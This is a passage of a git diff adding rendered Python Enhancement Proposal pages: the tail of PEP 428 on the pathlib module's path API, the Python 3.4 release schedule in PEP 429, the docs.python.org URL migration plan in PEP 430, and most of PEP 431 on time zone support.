The key reasoning behind not inheriting from str is to prevent accidentally +performing operations with a string representing a path and a string that +doesn’t, e.g. path + an_accident. Since operations with a string will not +necessarily lead to a valid or expected file system path, “explicit is better +than implicit” by avoiding accidental operations with strings by not +subclassing it. A blog post by a Python core developer goes into more detail +on the reasons behind this specific design decision.

+
+
+

Immutability

+

Path objects are immutable, which makes them hashable and also prevents a +class of programming errors.

+
+
+

Sane behaviour

+

Little of the functionality from os.path is reused. Many os.path functions +are tied by backwards compatibility to confusing or plain wrong behaviour +(for example, the fact that os.path.abspath() simplifies “..” path +components without resolving symlinks first).

+
+
+

Comparisons

+

Paths of the same flavour are comparable and orderable, whether pure or not:

+
>>> PurePosixPath('a') == PurePosixPath('b')
+False
+>>> PurePosixPath('a') < PurePosixPath('b')
+True
+>>> PurePosixPath('a') == PosixPath('a')
+True
+
+
+

Comparing and ordering Windows path objects is case-insensitive:

+
>>> PureWindowsPath('a') == PureWindowsPath('A')
+True
+
+
+

Paths of different flavours always compare unequal, and cannot be ordered:

+
>>> PurePosixPath('a') == PureWindowsPath('a')
+False
+>>> PurePosixPath('a') < PureWindowsPath('a')
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: unorderable types: PurePosixPath() < PureWindowsPath()
+
+
+

Paths compare unequal to, and are not orderable with instances of builtin +types (such as str) and any other types.

+
+
+

Useful notations

+

The API tries to provide useful notations all the while avoiding magic. +Some examples:

+
>>> p = Path('/home/antoine/pathlib/setup.py')
+>>> p.name
+'setup.py'
+>>> p.suffix
+'.py'
+>>> p.root
+'/'
+>>> p.parts
+('/', 'home', 'antoine', 'pathlib', 'setup.py')
+>>> p.relative_to('/home/antoine')
+PosixPath('pathlib/setup.py')
+>>> p.exists()
+True
+
+
+
+
+
+

Pure paths API

+

The philosophy of the PurePath API is to provide a consistent array of +useful path manipulation operations, without exposing a hodge-podge of +functions like os.path does.

+
+

Definitions

+

First a couple of conventions:

+
  • All paths can have a drive and a root. For POSIX paths, the drive is always empty.
  • A relative path has neither drive nor root.
  • A POSIX path is absolute if it has a root. A Windows path is absolute if it has both a drive and a root. A Windows UNC path (e.g. \\host\share\myfile.txt) always has a drive and a root (here, \\host\share and \, respectively).
  • A path which has either a drive or a root is said to be anchored. Its anchor is the concatenation of the drive and root. Under POSIX, “anchored” is the same as “absolute”.
+
+

Construction

+

We will present construction and joining together since they expose +similar semantics.

+

The simplest way to construct a path is to pass it its string representation:

+
>>> PurePath('setup.py')
+PurePosixPath('setup.py')
+
+
+

Extraneous path separators and "." components are eliminated:

+
>>> PurePath('a///b/c/./d/')
+PurePosixPath('a/b/c/d')
+
+
+

If you pass several arguments, they will be automatically joined:

+
>>> PurePath('docs', 'Makefile')
+PurePosixPath('docs/Makefile')
+
+
+

Joining semantics are similar to os.path.join, in that anchored paths ignore +the information from the previously joined components:

+
>>> PurePath('/etc', '/usr', 'bin')
+PurePosixPath('/usr/bin')
+
+
+

However, with Windows paths, the drive is retained as necessary:

+
>>> PureWindowsPath('c:/foo', '/Windows')
+PureWindowsPath('c:/Windows')
+>>> PureWindowsPath('c:/foo', 'd:')
+PureWindowsPath('d:')
+
+
+

Also, path separators are normalized to the platform default:

+
>>> PureWindowsPath('a/b') == PureWindowsPath('a\\b')
+True
+
+
+

Extraneous path separators and "." components are eliminated, but not +".." components:

+
>>> PurePosixPath('a//b/./c/')
+PurePosixPath('a/b/c')
+>>> PurePosixPath('a/../b')
+PurePosixPath('a/../b')
+
+
+

Multiple leading slashes are treated differently depending on the path +flavour. They are always retained on Windows paths (because of the UNC +notation):

+
>>> PureWindowsPath('//some/path')
+PureWindowsPath('//some/path/')
+
+
+

On POSIX, they are collapsed except if there are exactly two leading slashes, +which is a special case in the POSIX specification on pathname resolution +(this is also necessary for Cygwin compatibility):

+
>>> PurePosixPath('///some/path')
+PurePosixPath('/some/path')
+>>> PurePosixPath('//some/path')
+PurePosixPath('//some/path')
+
+
+

Calling the constructor without any argument creates a path object pointing +to the logical “current directory” (without looking up its absolute path, +which is the job of the cwd() classmethod on concrete paths):

+
>>> PurePosixPath()
+PurePosixPath('.')
+
+
+
+
+

Representing

+

To represent a path (e.g. to pass it to third-party libraries), just call +str() on it:

+
>>> p = PurePath('/home/antoine/pathlib/setup.py')
+>>> str(p)
+'/home/antoine/pathlib/setup.py'
+>>> p = PureWindowsPath('c:/windows')
+>>> str(p)
+'c:\\windows'
+
+
+

To force the string representation with forward slashes, use the as_posix() +method:

+
>>> p.as_posix()
+'c:/windows'
+
+
+

To get the bytes representation (which might be useful under Unix systems), +call bytes() on it, which internally uses os.fsencode():

+
>>> bytes(p)
+b'/home/antoine/pathlib/setup.py'
+
+
+

To represent the path as a file: URI, call the as_uri() method:

+
>>> p = PurePosixPath('/etc/passwd')
+>>> p.as_uri()
+'file:///etc/passwd'
+>>> p = PureWindowsPath('c:/Windows')
+>>> p.as_uri()
+'file:///c:/Windows'
+
+
+

The repr() of a path always uses forward slashes, even under Windows, for +readability and to remind users that forward slashes are ok:

+
>>> p = PureWindowsPath('c:/Windows')
+>>> p
+PureWindowsPath('c:/Windows')
+
+
+
+
+

Properties

+

Several simple properties are provided on every path (each can be empty):

+
>>> p = PureWindowsPath('c:/Downloads/pathlib.tar.gz')
+>>> p.drive
+'c:'
+>>> p.root
+'\\'
+>>> p.anchor
+'c:\\'
+>>> p.name
+'pathlib.tar.gz'
+>>> p.stem
+'pathlib.tar'
+>>> p.suffix
+'.gz'
+>>> p.suffixes
+['.tar', '.gz']
+
+
+
+
+

Deriving new paths

+
+

Joining

+

A path can be joined with another using the / operator:

+
>>> p = PurePosixPath('foo')
+>>> p / 'bar'
+PurePosixPath('foo/bar')
+>>> p / PurePosixPath('bar')
+PurePosixPath('foo/bar')
+>>> 'bar' / p
+PurePosixPath('bar/foo')
+
+
+

As with the constructor, multiple path components can be specified, either +collapsed or separately:

+
>>> p / 'bar/xyzzy'
+PurePosixPath('foo/bar/xyzzy')
+>>> p / 'bar' / 'xyzzy'
+PurePosixPath('foo/bar/xyzzy')
+
+
+

A joinpath() method is also provided, with the same behaviour:

+
>>> p.joinpath('Python')
+PurePosixPath('foo/Python')
+
+
+
+
+

Changing the path’s final component

+

The with_name() method returns a new path, with the name changed:

+
>>> p = PureWindowsPath('c:/Downloads/pathlib.tar.gz')
+>>> p.with_name('setup.py')
+PureWindowsPath('c:/Downloads/setup.py')
+
+
+

It fails with a ValueError if the path doesn’t have an actual name:

+
>>> p = PureWindowsPath('c:/')
+>>> p.with_name('setup.py')
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "pathlib.py", line 875, in with_name
+    raise ValueError("%r has an empty name" % (self,))
+ValueError: PureWindowsPath('c:/') has an empty name
+>>> p.name
+''
+
+
+

The with_suffix() method returns a new path with the suffix changed. +However, if the path has no suffix, the new suffix is added:

+
>>> p = PureWindowsPath('c:/Downloads/pathlib.tar.gz')
+>>> p.with_suffix('.bz2')
+PureWindowsPath('c:/Downloads/pathlib.tar.bz2')
+>>> p = PureWindowsPath('README')
+>>> p.with_suffix('.bz2')
+PureWindowsPath('README.bz2')
+
+
+
+
+

Making the path relative

+

The relative_to() method computes the relative difference of a path to +another:

+
>>> PurePosixPath('/usr/bin/python').relative_to('/usr')
+PurePosixPath('bin/python')
+
+
+

ValueError is raised if the method cannot return a meaningful value:

+
>>> PurePosixPath('/usr/bin/python').relative_to('/etc')
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "pathlib.py", line 926, in relative_to
+    .format(str(self), str(formatted)))
+ValueError: '/usr/bin/python' does not start with '/etc'
+
+
+
+
+
+

Sequence-like access

+

The parts property returns a tuple providing read-only sequence access +to a path’s components:

+
>>> p = PurePosixPath('/etc/init.d')
+>>> p.parts
+('/', 'etc', 'init.d')
+
+
+

Windows paths handle the drive and the root as a single path component:

+
>>> p = PureWindowsPath('c:/setup.py')
+>>> p.parts
+('c:\\', 'setup.py')
+
+
+

(separating them would be wrong, since C: is not the parent of C:\\).

+

The parent property returns the logical parent of the path:

+
>>> p = PureWindowsPath('c:/python33/bin/python.exe')
+>>> p.parent
+PureWindowsPath('c:/python33/bin')
+
+
+

The parents property returns an immutable sequence of the path’s +logical ancestors:

+
>>> p = PureWindowsPath('c:/python33/bin/python.exe')
+>>> len(p.parents)
+3
+>>> p.parents[0]
+PureWindowsPath('c:/python33/bin')
+>>> p.parents[1]
+PureWindowsPath('c:/python33')
+>>> p.parents[2]
+PureWindowsPath('c:/')
+
+
+
+
+

Querying

+

is_relative() returns True if the path is relative (see definition +above), False otherwise.

+

is_reserved() returns True if a Windows path is a reserved path such +as CON or NUL. It always returns False for POSIX paths.

+

match() matches the path against a glob pattern. It operates on +individual parts and matches from the right:

+
>>> p = PurePosixPath('/usr/bin')
+>>> p.match('/usr/b*')
+True
+>>> p.match('usr/b*')
+True
+>>> p.match('b*')
+True
+>>> p.match('/u*')
+False
+
+
+

This behaviour respects the following expectations:

+
  • A simple pattern such as “*.py” matches arbitrarily long paths as long as the last part matches, e.g. “/usr/foo/bar.py”.
  • Longer patterns can be used as well for more complex matching, e.g. “/usr/foo/*.py” matches “/usr/foo/bar.py”.
+
+
+

Concrete paths API

+

In addition to the operations of the pure API, concrete paths provide +additional methods which actually access the filesystem to query or mutate +information.

+
+

Constructing

+

The classmethod cwd() creates a path object pointing to the current +working directory in absolute form:

+
>>> Path.cwd()
+PosixPath('/home/antoine/pathlib')
+
+
+
+
+

File metadata

+

The stat() returns the file’s stat() result; similarly, lstat() +returns the file’s lstat() result (which is different iff the file is a +symbolic link):

+
>>> p.stat()
+posix.stat_result(st_mode=33277, st_ino=7483155, st_dev=2053, st_nlink=1, st_uid=500, st_gid=500, st_size=928, st_atime=1343597970, st_mtime=1328287308, st_ctime=1343597964)
+
+
+

Higher-level methods help examine the kind of the file:

+
>>> p.exists()
+True
+>>> p.is_file()
+True
+>>> p.is_dir()
+False
+>>> p.is_symlink()
+False
+>>> p.is_socket()
+False
+>>> p.is_fifo()
+False
+>>> p.is_block_device()
+False
+>>> p.is_char_device()
+False
+
+
+

The file owner and group names (rather than numeric ids) are queried +through corresponding methods:

+
>>> p = Path('/etc/shadow')
+>>> p.owner()
+'root'
+>>> p.group()
+'shadow'
+
+
+
+
+

Path resolution

+

The resolve() method makes a path absolute, resolving any symlink on +the way (like the POSIX realpath() call). It is the only operation which +will remove “..” path components. On Windows, this method will also +take care to return the canonical path (with the right casing).

+
+
+

Directory walking

+

Simple (non-recursive) directory access is done by calling the iterdir() +method, which returns an iterator over the child paths:

+
>>> p = Path('docs')
+>>> for child in p.iterdir(): child
+...
+PosixPath('docs/conf.py')
+PosixPath('docs/_templates')
+PosixPath('docs/make.bat')
+PosixPath('docs/index.rst')
+PosixPath('docs/_build')
+PosixPath('docs/_static')
+PosixPath('docs/Makefile')
+
+
+

This allows simple filtering through list comprehensions:

+
>>> p = Path('.')
+>>> [child for child in p.iterdir() if child.is_dir()]
+[PosixPath('.hg'), PosixPath('docs'), PosixPath('dist'), PosixPath('__pycache__'), PosixPath('build')]
+
+
+

Simple and recursive globbing is also provided:

+
>>> for child in p.glob('**/*.py'): child
+...
+PosixPath('test_pathlib.py')
+PosixPath('setup.py')
+PosixPath('pathlib.py')
+PosixPath('docs/conf.py')
+PosixPath('build/lib/pathlib.py')
+
+
+
+
+

File opening

+

The open() method provides a file opening API similar to the builtin +open() method:

+
>>> p = Path('setup.py')
+>>> with p.open() as f: f.readline()
+...
+'#!/usr/bin/env python3\n'
+
+
+
+
+

Filesystem modification

+

Several common filesystem operations are provided as methods: touch(), +mkdir(), rename(), replace(), unlink(), rmdir(), +chmod(), lchmod(), symlink_to(). More operations could be +provided, for example some of the functionality of the shutil module.
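Illustrative usage of a few of the methods listed above (assumes a writable current directory):

from pathlib import Path

p = Path("demo")
p.mkdir()
(p / "hello.txt").touch()
(p / "hello.txt").rename(p / "renamed.txt")
(p / "renamed.txt").unlink()
p.rmdir()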

+

Detailed documentation of the proposed API can be found at the pathlib +docs.

+
+
+
+

Discussion

+
+

Division operator

+

The division operator came out first in a poll about the path joining +operator. Initial versions of pathlib used square brackets +(i.e. __getitem__) instead.

+
+
+

joinpath()

+

The joinpath() method was initially called join(), but several people +objected that it could be confused with str.join() which has different +semantics. Therefore, it was renamed to joinpath().

+
+
+

Case-sensitivity

+

Windows users consider filesystem paths to be case-insensitive and expect +path objects to observe that characteristic, even though in some rare +situations some foreign filesystem mounts may be case-sensitive under +Windows.

+

In the words of one commenter,

+
+
“If glob(”*.py”) failed to find SETUP.PY on Windows, that would be a +usability disaster”.

—Paul Moore in +https://mail.python.org/pipermail/python-dev/2013-April/125254.html

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0428.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0429/index.html new file mode 100644 index 00000000000..4678c5342e6 --- /dev/null +++ b/pep-0429/index.html @@ -0,0 +1,220 @@ PEP 429 – Python 3.4 Release Schedule | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 429 – Python 3.4 Release Schedule

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
17-Oct-2012
+
Python-Version:
+
3.4
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.4. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
  • 3.4 Release Manager: Larry Hastings
  • Windows installers: Martin v. Löwis
  • Mac installers: Ned Deily
  • Documentation: Georg Brandl
+
+

Release Schedule

+

Python 3.4 has now reached its end-of-life and has been retired. +No more releases will be made.

+

These are all the historical releases of Python 3.4, +including their release dates.

+
  • 3.4.0 alpha 1: August 3, 2013
  • 3.4.0 alpha 2: September 9, 2013
  • 3.4.0 alpha 3: September 29, 2013
  • 3.4.0 alpha 4: October 20, 2013
  • 3.4.0 beta 1: November 24, 2013
  • 3.4.0 beta 2: January 5, 2014
  • 3.4.0 beta 3: January 26, 2014
  • 3.4.0 candidate 1: February 10, 2014
  • 3.4.0 candidate 2: February 23, 2014
  • 3.4.0 candidate 3: March 9, 2014
  • 3.4.0 final: March 16, 2014
  • 3.4.1 candidate 1: May 5, 2014
  • 3.4.1 final: May 18, 2014
  • 3.4.2 candidate 1: September 22, 2014
  • 3.4.2 final: October 6, 2014
  • 3.4.3 candidate 1: February 8, 2015
  • 3.4.3 final: February 25, 2015
  • 3.4.4 candidate 1: December 6, 2015
  • 3.4.4 final: December 20, 2015
  • 3.4.5 candidate 1: June 12, 2016
  • 3.4.5 final: June 26, 2016
  • 3.4.6 candidate 1: January 2, 2017
  • 3.4.6 final: January 17, 2017
  • 3.4.7 candidate 1: July 25, 2017
  • 3.4.7 final: August 9, 2017
  • 3.4.8 candidate 1: January 23, 2018
  • 3.4.8 final: February 4, 2018
  • 3.4.9 candidate 1: July 19, 2018
  • 3.4.9 final: August 2, 2018
  • 3.4.10 candidate 1: March 4, 2019
  • 3.4.10 final: March 18, 2019
+
+

Features for 3.4

+

Implemented / Final PEPs:

+
  • PEP 428, a “pathlib” module providing object-oriented filesystem paths
  • PEP 435, a standardized “enum” module
  • PEP 436, a build enhancement that will help generate introspection information for builtins
  • PEP 442, improved semantics for object finalization
  • PEP 443, adding single-dispatch generic functions to the standard library
  • PEP 445, a new C API for implementing custom memory allocators
  • PEP 446, changing file descriptors to not be inherited by default in subprocesses
  • PEP 450, a new “statistics” module
  • PEP 451, standardizing module metadata for Python’s module import system
  • PEP 453, a bundled installer for the pip package manager
  • PEP 454, a new “tracemalloc” module for tracing Python memory allocations
  • PEP 456, a new hash algorithm for Python strings and binary data
  • PEP 3154, a new and improved protocol for pickled objects
  • PEP 3156, a new “asyncio” module, a new framework for asynchronous I/O

Deferred to post-3.4:

+
  • PEP 431, improved support for time zone databases
  • PEP 441, improved Python zip application support
  • PEP 447, support for __locallookup__ metaclass method
  • PEP 448, additional unpacking generalizations
  • PEP 455, key transforming dictionary
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0429.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0430/index.html new file mode 100644 index 00000000000..285097217b6 --- /dev/null +++ b/pep-0430/index.html @@ -0,0 +1,334 @@ PEP 430 – Migrating to Python 3 as the default online documentation | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 430 – Migrating to Python 3 as the default online documentation

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Georg Brandl
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
27-Oct-2012
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a strategy for migrating the default version of the +Python documentation presented to users of Python when accessing +docs.python.org from 2.7 to Python 3.3.

+

It proposes a backwards compatible scheme that preserves the meaning of +existing deep links in to the Python 2 documentation, while still +presenting the Python 3 documentation by default, and presenting the +Python 2 and 3 documentation in a way that avoids making the Python 3 +documentation look like a second-class citizen.

+
+
+

Background

+

With the transition of the overall Python ecosystem from Python 2 to Python 3 +still in progress, one question which arises periodically [1], [2] is when +and how to handle the change from providing the Python 2 documentation as +the default version displayed at the docs.python.org root URL to providing +the Python 3 documentation.

+
+
+

Key Concerns

+

There are a couple of key concerns that any migration proposal needs to +address.

+
+

Don’t Confuse Beginners

+

Many beginners learn Python through third party resources. These resources, not all of which are online, may link into the python.org online documentation for additional background and details.

+

Importantly, even when the online documentation is updated, the “version +added” and “version changed” tags usually provide enough information for +users to adjust appropriately for the specific version they are using.

+

While deep links into the python.org documentation may occasionally break within the Python 2 series, this is very rare.

+

Migrating to Python 3 is a very different matter. Many links would break due +to renames and removals, and the “version added” and “version changed” +information for the Python 2 series is completely absent.

+
+
+

Don’t Break Useful Resources

+

There are many useful Python resources out there, such as the mailing list +archives on python.org and question-and-answer sites like Stack Overflow, +where links are highly unlikely to be updated, no matter how much notice +is provided.

+

Old posts and answers to questions all currently link to docs.python.org +expecting to get the Python 2 documentation at unqualified URLs. Links from +answers that relate to Python 3 are explicitly qualified with /py3k/ in +the path component.

+
+
+
+

Proposal

+

This PEP (based on an idea originally put forward back in May [3]) is to +not migrate the Python 2 specific deep links at all, and instead adopt a +scheme where all URLs presented to users on docs.python.org are qualified +appropriately with the relevant release series.

+

Visitors to the root URL at http://docs.python.org will be automatically +redirected to http://docs.python.org/3/, but links deeper in +the version-specific hierarchy, such as to +http://docs.python.org/library/os, will instead be redirected to +a Python 2 specific link such as http://docs.python.org/2/library/os.

+

The specific subpaths which will be redirected to explicitly qualified +paths for the Python 2 docs are:

+
  • /c-api/
  • /distutils/
  • /extending/
  • /faq/
  • /howto/
  • /library/
  • /reference/
  • /tutorial/
  • /using/
  • /whatsnew/
  • /about.html
  • /bugs.html
  • /contents.html
  • /copyright.html
  • /license.html
  • /genindex.html
  • /glossary.html
  • /py-modindex.html
  • /search.html

The existing /py3k/ subpath will be redirected to the new /3/ +subpath.
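To make the redirection scheme concrete, here is a minimal illustrative sketch in Python (the real implementation would be web server rewrite rules maintained by the python.org infrastructure team; the function and constant names below are invented for this sketch):

PY2_SUBPATHS = (
    'c-api/', 'distutils/', 'extending/', 'faq/', 'howto/', 'library/',
    'reference/', 'tutorial/', 'using/', 'whatsnew/', 'about.html',
    'bugs.html', 'contents.html', 'copyright.html', 'license.html',
    'genindex.html', 'glossary.html', 'py-modindex.html', 'search.html',
)

def redirect_target(path):
    """Map an unqualified docs.python.org path to a qualified one."""
    path = path.lstrip('/')
    if path == '':
        return '/3/'  # the landing page redirects to the Python 3 docs
    if path.startswith('py3k/'):
        return '/3/' + path[len('py3k/'):]  # legacy Python 3 deep links
    if path.startswith(PY2_SUBPATHS):
        return '/2/' + path  # preserve the meaning of Python 2 deep links
    return '/' + path  # already qualified; leave untouched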

+
+

Presented URLs

+

With this scheme, the following URLs would be presented to users after +resolution of any aliasing and rewriting rules:

+
    +
  • http://docs.python.org/x/*
  • +
  • http://docs.python.org/x.y/*
  • +
  • http://docs.python.org/dev/*
  • +
  • http://docs.python.org/release/x.y.z/*
  • +
  • http://docs.python.org/devguide
  • +
+

The /x/ URLs mean “give me the latest documentation for a released +version in this release series”. It will draw the documentation from the +relevant maintenance branch in source control (this will always be the +2.7 branch for Python 2 and is currently 3.3 for Python 3). Differences +relative to previous versions in the release series will be available +through “version added” and “version changed” markers.

+

The /x.y/ URLs mean “give me the latest documentation for this release”. +It will draw the documentation from the relevant maintenance branch in +source control (or the default branch for the currently in development +version). It differs from the status quo in that the URLs will +actually remain available in the user’s browser for easy copy and pasting. +(Currently, references to specific versions that are not the latest in their +release series will resolve to a stable URL for a specific maintenance +version in the “release” hierarchy, while the current latest version in the +release series resolves to the release series URL. This makes it hard to get +a “latest version specific URL”, since it is always necessary to construct +them manually).

+

The /dev/ URL means the documentation for the default branch in source +control.

+

The /release/x.y.z/ URLs will refer to the documentation of those releases, exactly as it was at the time of the release.

+

The developer’s guide is not version specific, and thus retains its own +stable /devguide/ URL.

+
+
+
+

Rationale

+

There is some desire to switch the unqualified references to mean Python 3 +as a sign of confidence in Python 3. Such a move would either break a lot of +things, or else involve an awful lot of work to avoid breaking things.

+

I believe we can get much the same effect without breaking the world by:

+
  1. Deprecating the use of unqualified references to the online documentation (while promising to preserve the meaning of such references indefinitely)
  2. Updating all python.org and python-dev controlled links to use qualified references (excluding archived email)
  3. Redirecting visitors to the root of http://docs.python.org to http://docs.python.org/3.x

Most importantly, because this scheme doesn’t alter the behaviour of any +existing deep links, it could be implemented with a significantly shorter +warning period than would be required for a scheme that risked breaking +deep links, or started to redirect unqualified links to Python 3. The +only part of the scheme which would require any warning at all is the +step of redirecting the “http://docs.python.org/” landing page to the +Python 3.3 documentation.

+

Namespaces are one honking great idea - let’s do more of those.

+

Note that the approach described in this PEP gives two ways to access the +content of the default branch: as /dev/ or using the appropriate +/x.y/ reference. This is deliberate, as the default branch is referenced +for two different purposes:

+
  • to provide additional information when discussing an upcoming feature of the next release (a /x.y/ URL is appropriate)
  • to provide a stable destination for developers to access the documentation of the next feature release, regardless of the version (a /dev/ URL is appropriate)
+
+

Implementation

+

The URLs on docs.python.org are controlled by the python.org infrastructure +team rather than through the CPython source repo, so acceptance and +implementation of the ideas in this PEP will be up to the team.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0430.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0431/index.html new file mode 100644 index 00000000000..9a412c10260 --- /dev/null +++ b/pep-0431/index.html @@ -0,0 +1,436 @@ PEP 431 – Time zone support improvements | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 431 – Time zone support improvements

+
+
Author:
+
Lennart Regebro <regebro at gmail.com>
+
BDFL-Delegate:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
11-Dec-2012
+
Post-History:
+
11-Dec-2012, 28-Dec-2012, 28-Jan-2013
+
Superseded-By:
+
615
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the implementation of concrete time zone support in the +Python standard library, and also improvements to the time zone API to deal +with ambiguous time specifications during DST changes.

+
+
+

Withdrawal

+

After lengthy discussion it has turned out that the things I thought were problems in datetime’s implementation are intentional. Those include completely ignoring DST transitions when doing datetime arithmetic. That makes the is_dst flags part of this PEP pointless, as they would have no useful function. datetime by design does not distinguish between ambiguous datetimes and will never do so.

+

I therefore withdraw this PEP.

+

UPDATE: PEP 615, “Support for the IANA Time Zone Database in the Standard Library”, added the zoneinfo module to Python 3.9 and superseded this PEP.

+
+
+

Proposal

+
+

Concrete time zone support

+

The time zone support in Python has no concrete implementation in the standard library outside of a tzinfo base class that supports fixed offsets. To properly support time zones you need to include a database of all time zones, both current and historical, including daylight saving changes. But such information changes frequently, so even if we included the latest information in a Python release, that information would be outdated just a few months later.

+

Time zone support has therefore only been available through two third-party modules, pytz and dateutil, both of which include and wrap the “zoneinfo” database. This database, also called “tz” or “the Olson database”, is the de facto standard time zone database, and it is included in most Unix and Unix-like operating systems, including OS X.

+

This gives us the opportunity to include the code that supports the zoneinfo +data in the standard library, but by default use the operating system’s copy +of the data, which typically will be kept updated by the updating mechanism +of the operating system or distribution.

+

For those who have an operating system that does not include the zoneinfo +database, for example Windows, the Python source distribution will include a +copy of the zoneinfo database, and a distribution containing the latest +zoneinfo database will also be available at the Python Package Index, so it +can be easily installed with the Python packaging tools such as +easy_install or pip. This could also be done on Unices that are no +longer receiving updates and therefore have an outdated database.

+

With such a mechanism Python would have full time zone support in the standard library on any platform, and a simple package installation would provide an updated time zone database on those platforms where the zoneinfo database isn’t included, such as Windows, or on platforms where OS updates are no longer provided.

+

The time zone support will be implemented by making the datetime module +into a package, and adding time zone support to datetime based on Stuart +Bishop’s pytz module.

+
+
+

Getting the local time zone

+

On Unix there is no standard way of finding the name of the time zone that is +being used. All the information that is available is the time zone +abbreviations, such as EST and PDT, but many of those abbreviations +are ambiguous and therefore you can’t rely on them to figure out which time +zone you are located in.

+

There is, however, a standard location for the compiled time zone information: /etc/localtime. Therefore, it is possible to create a local time zone object with the correct time zone information even though you don’t know the name of the time zone. A function in datetime should be provided to return the local time zone.

+

The support for this will be made by integrating Lennart Regebro’s +tzlocal module into the new datetime module.

+

For Windows it will look up the local Windows time zone name, and use a +mapping between Windows time zone names and zoneinfo time zone names provided +by the Unicode consortium to convert that to a zoneinfo time zone.

+

The mapping should be updated before each major or bugfix release, scripts +for doing so will be provided in the Tools/ directory.

+
+
+

Ambiguous times

+

When changing over from daylight saving time (DST) the clock is turned back one hour. This means that the times during that hour happen twice, once with DST and then once without DST. Similarly, when changing to daylight saving time, one hour goes missing.

+

The current time zone API can not differentiate between the two ambiguous times during a change from DST. For example, in Stockholm the time of 2012-10-28 02:00:00 happens twice, both at UTC 2012-10-28 00:00:00 and also at UTC 2012-10-28 01:00:00.

+

The current time zone API can not disambiguate this and therefore it’s +unclear which time should be returned:

+
# This could be either 00:00 or 01:00 UTC:
+>>> dt = datetime(2012, 10, 28, 2, 0, tzinfo=zoneinfo('Europe/Stockholm'))
+# But we can not specify which:
+>>> dt.astimezone(zoneinfo('UTC'))
+datetime.datetime(2012, 10, 28, 1, 0, tzinfo=<UTC>)
+
+
+

pytz solved this problem by adding is_dst parameters to several +methods of the tzinfo objects to make it possible to disambiguate times when +this is desired.

+

This PEP proposes to add these is_dst parameters to the relevant methods of the datetime API, and therefore add this functionality directly to datetime. This is likely the hardest part of this PEP, as it involves updating the C version of the datetime library with new functionality, writing new code rather than just reorganizing existing external libraries.

+
+
+
+

Implementation API

+
+

The zoneinfo database

+

The latest version of the zoneinfo database should exist in the +Lib/tzdata directory of the Python source control system. This copy of +the database should be updated before every Python feature and bug-fix +release, but not for releases of Python versions that are in +security-fix-only-mode.

+

Scripts to update the database will be provided in Tools/, and the +release instructions will be updated to include this update.

+

New configure options --enable-internal-timezone-database and +--disable-internal-timezone-database will be implemented to enable and +disable the installation of this database when installing from source. A +source install will default to installing them.

+

Binary installers for systems that have a system-provided zoneinfo database +may skip installing the included database since it would never be used for +these platforms. For other platforms, for example Windows, binary installers +must install the included database.

+
+
+

Changes in the datetime-module

+

The public API of the new time zone support contains one new class, one new function, four new exceptions and two new collections. In addition to this, several methods on the datetime object get a new is_dst parameter.

+
+

New class dsttimezone

+

This class provides a concrete implementation of the tzinfo base +class that implements DST support.

+
+
+

New function zoneinfo(name=None, db_path=None)

+

This function takes a name string that must be a string specifying a +valid zoneinfo time zone, i.e. “US/Eastern”, “Europe/Warsaw” or “Etc/GMT”. +If not given, the local time zone will be looked up. If an invalid zone name +is given, or the local time zone can not be retrieved, the function raises +UnknownTimeZoneError.

+

The function also takes an optional path to the location of the zoneinfo +database which should be used. If not specified, the function will look for +databases in the following order:

+
  1. Check if the tzdata-update module is installed, and then use that database.
  2. Use the database in /usr/share/zoneinfo, if it exists.
  3. Use the Python-provided database in Lib/tzdata.

If no database is found an UnknownTimeZoneError or subclass thereof will +be raised with a message explaining that no zoneinfo database can be found, +but that you can install one with the tzdata-update package.
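As a hypothetical usage sketch (this proposed API was never implemented, so the exact output shown is an assumption based on the description above):

>>> from datetime import datetime, zoneinfo
>>> tz = zoneinfo('Europe/Warsaw')
>>> datetime(2013, 7, 1, 12, 0, tzinfo=tz).tzname()
'CEST'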

+
+
+

New parameter is_dst

+

A new is_dst parameter is added to several methods to handle time +ambiguity during DST changeovers.

+
  • tzinfo.utcoffset(dt, is_dst=False)
  • tzinfo.dst(dt, is_dst=False)
  • tzinfo.tzname(dt, is_dst=False)
  • datetime.astimezone(tz, is_dst=False)

The is_dst parameter can be False (default), True, or None.

+

False will specify that the given datetime should be interpreted as not happening during daylight saving time, i.e. that the time specified is after the change from DST. This is the default, to preserve existing behavior.

+

True will specify that the given datetime should be interpreted as happening +during daylight savings time, i.e. that the time specified is before the change +from DST.

+

None will raise an AmbiguousTimeError exception if the time specified +was during a DST change over. It will also raise a NonExistentTimeError +if a time is specified during the “missing time” in a change to DST.
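As a short sketch of how these flags would disambiguate the Stockholm example from earlier (hypothetical output, since this API was never implemented):

>>> dt = datetime(2012, 10, 28, 2, 0, tzinfo=zoneinfo('Europe/Stockholm'))
>>> dt.astimezone(zoneinfo('UTC'), is_dst=True)   # first occurrence, during DST
datetime.datetime(2012, 10, 28, 0, 0, tzinfo=<UTC>)
>>> dt.astimezone(zoneinfo('UTC'), is_dst=False)  # second occurrence, after DST
datetime.datetime(2012, 10, 28, 1, 0, tzinfo=<UTC>)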

+
+
+

